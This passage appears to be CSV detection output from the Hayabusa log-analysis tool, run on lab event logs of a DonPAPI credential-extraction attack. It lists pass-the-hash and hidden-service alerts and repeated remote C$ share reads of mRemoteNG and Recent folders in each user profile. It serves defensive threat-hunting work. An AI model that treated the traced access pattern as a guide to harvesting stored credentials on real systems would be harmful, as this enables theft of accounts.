2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP 
Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 
| LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP 
Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default 
User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default 
User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
